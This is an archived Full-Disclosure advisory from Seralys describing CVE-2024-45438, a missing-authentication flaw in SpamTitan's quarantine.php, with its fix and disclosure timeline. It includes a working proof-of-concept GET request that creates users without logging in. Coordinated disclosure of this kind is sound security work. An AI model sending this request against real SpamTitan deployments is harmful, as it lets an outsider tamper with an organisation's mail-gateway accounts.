lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <DB3PR10MB680992C20C0DBB10495ABD8ED033A@DB3PR10MB6809.EURPRD10.PROD.OUTLOOK.COM>
Date: Wed, 20 Aug 2025 14:40:55 +0000
From: Seralys Research Team via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2024-45438 - SpamTitan Unauthenticated User Creation

    Seralys Security Advisory | https://www.seralys.com/research
	
======================================================================
Title:       Unauthenticated User Creation
Product:     SpamTitan Email Security Gateway
Affected:    Confirmed on 8.00.95 
Fixed in:    8.00.101 and 8.01.14
Vendor:      TitanHQ
Discovered:  May 2024
Severity:    HIGH
CWE:         CWE-306: Missing Authentication for Critical Function
CVE:         CVE-2024-45438
CVSS:        8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Discovered by: Philippe Caturegli (Seralys) & Julian B.

======================================================================
Overview
--------

The file `quarantine.php` within the SpamTitan interface allows 
unauthenticated users to trigger account-level actions using a crafted 
GET request. Notably, when a non-existent email address is provided as 
part of the `email` parameter, SpamTitan will automatically create a 
user record and associate quarantine settings with it - all without 
requiring authentication.

This allows an attacker to manipulate internal application behavior 
or inject data into the user base, potentially leading to privilege 
escalation paths or information leaks in misconfigured environments.

======================================================================
Technical Details
-----------------

Affected Endpoint:
------------------
`quarantine.php`

Unauthenticated request triggers user creation:
```
/quarantine.php?language=en&role_type=admin&action=setperiod&
email=admin@...acker.com&period=WD&secret_id=1
```

Pseudo-code logic:
```
$email = $_GET['email'];
if (!empty($email)) {
    $user_id = db_getmaddr_id($email); 
}
```

Helper function (simplified behavior):
```
function db_getmaddr_id($email, $create = 1) {
    if (not exists in `maddr` table and $create == 1) {
        INSERT INTO maddr (email, domain)
    }
    return user_id;
}
```

- Because `db_getmaddr_id($email)` is invoked with only one argument,
  the default value `$create = 1` is used, which triggers implicit 
  user creation.
- No session or authentication checks are performed prior to 
  executing the action.
- The `role_type` parameter (e.g., `admin`) is accepted via query 
  string but never validated.

======================================================================
Proof of Concept
-----------------

Send the following GET request without authentication:

```
GET /quarantine.php?language=en&role_type=admin&action=setperiod&
email=user@...acker.com&period=WD&secret_id=1 HTTP/1.1
Host: spamtitan.local
```

Effect:
- A new user `user@...acker.com` is silently created.
- Digest preference is set to "weekly".
- No authentication or token is required.

======================================================================
Impact
-------

- Unauthenticated creation of internal user records
- Manipulation of quarantine report settings for arbitrary emails
- Potential for denial of service or persistence via spam report 
  hijacking
  - Expands the application attack surface for further exploitation
  
======================================================================
Vendor Response
---------------

TitanHQ implemented fixes for this vulnerability as part of a 
coordinated disclosure effort. 

The issue has been resolved in the following versions: 
- SpamTitan Gateway v.8.00.101 
- SpamTitan Gateway v.8.01.14

Note: if a customer has set the token expiration period to 0 
(disabling tokens), then it would still be possible to add users. 
The quarantine settings page now shows a warning if a customer has 
this set to 0, and going forward it is not possible to set the token 
expiration period lower than 1

======================================================================
Timeline
--------

- 2024-05-12: Vulnerability discovered during a pentest
- 2025-04-28: Advisory drafted (we kind of forgot about that vuln :))
- 2025-04-28: Initial advisory submitted to TitanHQ
- 2025-05-06: Follow up #1 from Seralys
- 2025-05-16: Follow up #2 from Seralys
- 2025-05-19: TitanHQ acknowledged receipt and initiated coordination
- 2025-06-13: TitanHQ publicly released a fix in v 8.00.101 and 8.01.14
- 2025-08-20: Public disclosure by Seralys

======================================================================
About Seralys
--------------

Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and 
security assessments.

https://www.seralys.com

======================================================================
Acknowledgments
---------------

Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================
Disclaimer
----------

This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ